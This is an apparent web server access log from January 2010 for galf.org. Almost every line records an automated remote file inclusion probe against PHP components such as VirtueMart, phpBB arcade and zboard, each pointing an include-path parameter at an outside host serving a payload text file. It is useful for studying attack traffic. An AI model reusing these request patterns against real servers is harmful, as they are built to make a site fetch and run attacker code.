201.45.123.132 - - [17/Jan/2010:18:11:30 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [17/Jan/2010:18:11:32 -0800] "GET /logs/access_090928.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:11:40 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:18:15:09 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:17:06 -0800] "GET /logs/access_091130.log%20%20//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:17:06 -0800] "GET /arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:17:06 -0800] "GET /logs//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:18:24 -0800] "GET /logs/access_090525.log//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:18:24 -0800] "GET /arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:18:24 -0800] "GET /logs//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:18:53 -0800] "GET /logs/access_090831.log//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:22:27 -0800] "GET /logs/access_091130.log%20%20//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:22:27 -0800] "GET /arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:22:27 -0800] "GET /logs//arcade.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:10 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:10 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:10 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:18 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:18 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:18 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:23 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:23 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:25 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:40 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:40 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:27:40 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:28:38 -0800] "GET /logs/access_091109.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.80.193.27 - - [17/Jan/2010:18:28:51 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM; InfoPath.1)" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:13 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:17 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:17 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:18 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:19 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:29:31 -0800] "GET /logs/access_091019.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:37 -0800] "GET /?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:37 -0800] "GET /logs/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:37 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:47 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:18:29:59 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:32:08 -0800] "GET /logs//stats/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:32:08 -0800] "GET /stats/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:32:08 -0800] "GET /logs/access_091214.log%20%20//stats/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:32:18 -0800] "GET /logs/access_090831.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:32:42 -0800] "GET /logs/access_090727.log//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:34:02 -0800] "GET /logs/access_090824.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:34:08 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:34:57 -0800] "GET /logs/access.log//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:38:14 -0800] "GET /logs/access_090803.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:38:36 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:38:36 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:38:36 -0800] "GET /logs/access.log%20%20//e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [17/Jan/2010:18:39:13 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:39:13 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:39:13 -0800] "GET /logs/access_100111.log%20%20//e404.php?DOCUMENT_ROOT=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:39:47 -0800] "GET /logs/access_090727.log//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:41:40 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [17/Jan/2010:18:41:40 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [17/Jan/2010:18:41:40 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.6.189.153 - - [17/Jan/2010:18:42:18 -0800] "GET /logs/access_090907.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
121.78.118.94 - - [17/Jan/2010:18:42:32 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.118.94 - - [17/Jan/2010:18:42:32 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.118.94 - - [17/Jan/2010:18:42:33 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.93.208.12 - - [17/Jan/2010:18:43:14 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:43:14 -0800] "GET /logs/access_100111.log//bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.93.208.12 - - [17/Jan/2010:18:43:14 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:18:43:55 -0800] "GET /logs/access.log//modules/Forums/admin/index.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [17/Jan/2010:18:44:04 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [17/Jan/2010:18:44:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [17/Jan/2010:18:44:06 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:44:34 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:18:44:34 -0800] "GET /logs/access.log//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:18:44:34 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.161.125 - - [17/Jan/2010:18:46:18 -0800] "GET /logs/access_100111.log//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:46:18 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:46:18 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:18:48:45 -0800] "GET /logs/access_091012.log%20%20//?_SERVER[HTML_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:18:48:45 -0800] "GET /?_SERVER[HTML_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.236.38.227 - - [17/Jan/2010:18:48:45 -0800] "GET /logs//?_SERVER[HTML_ROOT]=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:49:27 -0800] "GET /logs//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:49:28 -0800] "GET /daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.161.125 - - [17/Jan/2010:18:49:28 -0800] "GET /logs/access_100111.log%20%20//daerew_45galleryGD/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:02 -0800] "GET /administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:02 -0800] "GET /logs//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:48 -0800] "GET /logs//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:48 -0800] "GET /administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:49 -0800] "GET /administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:49 -0800] "GET /logs//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:18:50:53 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:53:29 -0800] "GET /administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:53:29 -0800] "GET /logs//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [17/Jan/2010:18:53:30 -0800] "GET /logs/access_090907.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:18:53:33 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.144 - - [17/Jan/2010:18:56:34 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:00:55 -0800] "GET /zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:00:55 -0800] "GET /logs//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:00:55 -0800] "GET /logs/access_090928.log%20%20//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:00:55 -0800] "GET /logs/access_091019.log%20%20//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:01:17 -0800] "GET /zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:01:17 -0800] "GET /logs/access_090928.log//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:01:18 -0800] "GET /logs/access_091019.log//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [17/Jan/2010:19:01:18 -0800] "GET /logs//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [17/Jan/2010:19:03:55 -0800] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.118.94 - - [17/Jan/2010:19:04:15 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [17/Jan/2010:19:05:56 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:06 -0800] "GET /%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:06 -0800] "GET /logs//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:06 -0800] "GET /logs/access_090831.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:07 -0800] "GET /logs//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:07 -0800] "GET /%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:07 -0800] "GET /logs/access_090831.log%20%20//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:20 -0800] "GET /logs/access_090713.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:08:26 -0800] "GET /logs/access_090713.log%20%20//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:04 -0800] "GET /logs//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
